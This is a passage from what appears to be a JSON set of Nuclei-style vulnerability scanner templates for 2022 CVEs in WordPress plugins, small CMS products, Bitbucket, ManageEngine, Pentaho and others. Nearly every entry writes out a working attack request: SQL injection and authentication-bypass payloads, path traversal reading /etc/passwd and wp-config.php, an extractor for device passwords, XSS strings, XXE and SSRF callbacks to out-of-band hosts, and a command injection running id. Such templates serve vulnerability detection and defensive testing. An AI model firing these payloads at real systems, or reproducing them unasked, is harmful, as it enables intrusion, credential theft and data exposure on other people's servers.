\".documentor-help\")"],"condition":"and"}]}]},{"id":"CVE-2022-25488","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/ajax/avatar.php?id=-1+union+select+md5({{num}})%23"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/{{md5(num)}}","avatar-container"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0781","info":{"name":"WordPress Nirweb Support <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=answerd_ticket&id_form=1 UNION ALL SELECT NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23544","info":{"name":"MeterSphere < 2.5.0 SSRF","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/md/get/url?url=http://oast.pro"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29349","info":{"name":"kkFileView 4.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D"],"matchers-condition":"and","matchers":[{"type":"word","words":["txt\"><img src=111 onerror=alert(1)>123"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2627","info":{"name":"WordPress Newspaper < 12 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=td_ajax_loop&loopState[moduleId]={{xss_payload}}&loopState[server_reply_html_data]=\n"],"payloads":{"xss_payload":["<form><math><img+onerror=alert(document.domain)+src=1><mtext></form>"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<form><math><img onerror=alert(document.domain) src=1><mtext>","td-block-"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28022","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Master.php?f=delete_item HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid=test'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"success\")"],"condition":"and"}]}]},{"id":"CVE-2022-33174","info":{"name":"Powertek Firmware <3.30.30 - Authorization Bypass","severity":"high"},"requests":[{"raw":["GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1\nHost: {{Hostname}}\nCookie: tmpToken=;\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<sys.passwd>","<sys.su.name>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["<sys\\.passwd>([A-Z0-9a-z]+)<\\/sys\\.passwd>","<sys\\.su\\.name>([a-z]+)<\\/sys\\.su\\.name>"],"part":"body"}]}]},{"id":"CVE-2022-25485","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertLightbox.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40083","info":{"name":"Labstack Echo 4.8.0 - Open Redirect","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}//interactsh.com%2f.."],"matchers-condition":"and","matchers":[{"type":"regex","part":"location","regex":["^\\s*//interactsh.com/\\.\\."]},{"type":"status","status":[301]}]}]},{"id":"CVE-2022-0785","info":{"name":"WordPress Daily Prayer Time <2022.03.01 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"dptTimetable customStyles dptUserStyles\")"],"condition":"and"}]}]},{"id":"CVE-2022-29548","info":{"name":"WSO2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CARBON.showWarningDialog('???');alert(document.domain)//???"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0212","info":{"name":"WordPress Spider Calendar <=1.5.65 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=window&callback=</script><img/src/onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["spider_Calendar_theme","</script><img/src/onerror=alert(document.domain)>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32094","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /hms/doctor/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Doctor  | Dashboard</title>","View Appointment History"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1390","info":{"name":"WordPress Admin Word Count Column 2.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\\0"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29009","info":{"name":"Cyber Cafe Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /ccms/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=%27+Or+1--+-&password=1&login=\n","GET /ccms/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CCMS Admin Dashboard","CCMS ADMIN | Admin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26159","info":{"name":"Ametys CMS Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm"],"matchers-condition":"and","matchers":[{"type":"word","words":["<auto-completion>","<item>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1119","info":{"name":"WordPress Simple File List <3.2.8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43018","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>:0"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2373","info":{"name":"WordPress Simply Schedule Appointments <1.5.7.7 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/ssa/v1/users"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["response_code\":200","\"email\":\"([a-zA-Z-_0-9@.]+)\",\"display_name\":\"([a-zA-Z-_0-9@.]+)\",\"gravatar_url\":\"http?:\\\\\\/\\\\\\/([a-z0-9A-Z.\\\\\\/?=&@_-]+)\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33901","info":{"name":"WordPress MultiSafepay for WooCommerce <=4.13.1 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27849","info":{"name":"WordPress Simple Ajax Chat <20220116 - Sensitive Information Disclosure vulnerability","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"Chat Log\"","\"User IP\"","\"User ID\""],"condition":"and"},{"type":"word","part":"header","words":["text/csv"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1724","info":{"name":"WordPress Simple Membership <4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"<script>alert(document.domain)</script>\","]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45354","info":{"name":"Download Monitor <= 4.7.60 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/download-monitor/v1/user_data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"registered\":","\"display_name\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24899","info":{"name":"Contao <4.13.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>","\"Not authenticated\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2022-37191","info":{"name":"Cuppa CMS v1.0 - Authenticated Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_api_keys\n","POST /api/index.php HTTP/1.1\nHost: {{Hostname}}\nkey: {{apikey}}\nContent-Type: application/x-www-form-urlencoded\n\nfunction=./../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd/\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header_3","words":["text/html"]},{"type":"regex","part":"body_3","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apikey","group":1,"regex":["<td class='td_key'>(.*?)</td>"],"internal":true}]}]},{"id":"CVE-2022-45805","info":{"name":"WordPress Paytm Payment Gateway <=2.7.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/post.php?post=1+AND+(SELECT+6205+FROM+(SELECT(SLEEP(6)))RtRs)&action=edit HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_2, \"toplevel_page_paytm\")"],"condition":"and"}]}]},{"id":"CVE-2022-36883","info":{"name":"Jenkins Git <=4.11.3 - Missing Authorization","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["repository:","SCM API plugin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1020","info":{"name":"WordPress WooCommerce <3.1.2 - Arbitrary Function Call","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_key=a&perpose=update&callback=phpinfo\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-2383","info":{"name":"WordPress Feed Them Social <3.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)><br/>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24266","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\norder_by=id`,if(SUBSTRING('test',1,1)='t',sleep(6),sleep(0))--+-&path=component%2Ftable_manager%2Fview%2Fcu_users&uniqueClass=wrapper_content_919044\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"list_admin_table\")"],"condition":"and"}]}]},{"id":"CVE-2022-44947","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/listing_highlight&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&is_active=1&fields_id=193&fields_values%5B%5D=67&bg_color=&sort_order=&notes=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-43170","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=dashboard_configure/index&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=info_block&is_active=1&sections_id=0&color=default&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&icon=&description=&sort_order=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-25486","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertConfigField.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurlConfig=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3980","info":{"name":"Sophos Mobile managed on-premises - XML External Entity Injection","severity":"critical"},"requests":[{"raw":["@timeout: 50s\nPOST /servlets/OmaDsServlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: \"application/xml\"\n\n<?xml version=\"1.0\"?>\n<!DOCTYPE cdl [<!ENTITY % test SYSTEM \"http://{{interactsh-url}}\">%test;]>\n<cdl>test</cdl>\n"],"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')","status_code == 400","len(body) == 0"],"condition":"and"}]}]},{"id":"CVE-2022-1392","info":{"name":"WordPress Videos sync PDF <=1.7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["failed to open stream: No such file or directory","REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25497","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /js/filemanager/api/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"from\":\"//../../../../../../../../../../../../../etc/passwd\",\"to\":\"/../{{randstr}}.txt\",\"action\":\"copyFile\"}\n","GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["text/plain"]},{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36642","info":{"name":"Omnia MPX 1.5.0+r1 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd","{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["\"username\":","\"password\":","\"mustChangePwd\":","\"roleUser\":"],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0"]}]}]},{"id":"CVE-2022-0788","info":{"name":"WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": \"(SELECT 1 FROM (SELECT(SLEEP(6)))me)\", \"formid\": \"1\", \"type\": \"online_payment\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"Invalid payment.\")"],"condition":"and"}]}]},{"id":"CVE-2022-35151","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","\u56fe\u7247\u9884\u89c8"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42748","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-31879","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nGET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(0)))dPPt)+AND+'rogN'='rogN HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nGET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(10)))dPPt)+AND+'rogN'='rogN HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 200","duration_2 - duration_1 >= 7","contains(content_type_2, \"text/html\")","contains(body_2, \"Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2022-25323","info":{"name":"ZEROF Web Server 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["back<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2022-47966","info":{"name":"ManageEngine - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /SamlResponseServlet HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLResponse={{url_encode(base64(SAMLResponse))}}&RelayState=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Unknown error occurred while processing your request"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-21661","info":{"name":"WordPress <5.8.3 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=ecsload&query={\"tax_query\":{\"0\":{\"field\":\"term_taxonomy_id\",\"terms\":[\"\"]}}}&ecs_ajax_settings={\"post_id\":\"1\", \"current_page\":1, \"widget_id\":1, \"theme_id\":1, \"max_num_pages\":10}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"WordPress database error:\")","contains(body, \"error in your SQL syntax\")"],"condition":"and"}]}]},{"id":"CVE-2022-28923","info":{"name":"Caddy 2.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C%5Cinteract.sh/%252e%252e%252f"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-31980","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=teams/manage_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Control Teams\")"],"condition":"and"}]}]},{"id":"CVE-2022-1391","info":{"name":"WordPress Cab fare calculator < 1.0.4 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43769","info":{"name":"Hitachi Pentaho Business Analytics Server - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&mgrDn=a&pwd=a"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["false"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-24900","info":{"name":"Piano LED Visualizer 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3933","info":{"name":"WordPress Essential Real Estate <3.9.6 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=ere_property_gallery_fillter_ajax&columns_gap=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C!-- HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"><script>alert(document.domain)</script>\")","contains(body_2, \"ere_property_gallery\")"],"condition":"and"}]}]},{"id":"CVE-2022-1439","info":{"name":"Microweber <1.2.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div class='x module module-'onmouseover=alert(document.domain) '","parent-module-id"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46071","info":{"name":"Helmet Store Showroom v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername='+OR+1%3D1+--+-&password=1234\n","GET /admin/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"Helmet Store\") && contains(body_2, \"Adminstrator Admin\")"],"condition":"and"}]}]},{"id":"CVE-2022-4057","info":{"name":"Autoptimize < 3.1.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/ao_ccss/queuelog.html","{{BaseURL}}/blog/wp-content/uploads/ao_ccss/queuelog.html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Job id &lt;","log messages"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36804","info":{"name":"Atlassian Bitbucket - Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /rest/api/latest/repos HTTP/1.1\nHost: {{Hostname}}\n","GET /rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&at={{data}}&path={{data}}&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"iterate-all":true,"matchers-condition":"and","matchers":[{"type":"word","words":["com.atlassian.bitbucket.scm.CommandFailedException"]},{"type":"status","status":[500]}],"extractors":[{"type":"json","name":"key","internal":true,"json":[".[\"values\"] | .[] | .[\"project\"] | .key"],"part":"body"},{"type":"json","name":"slug","internal":true,"json":[".[\"values\"] | .[]  | 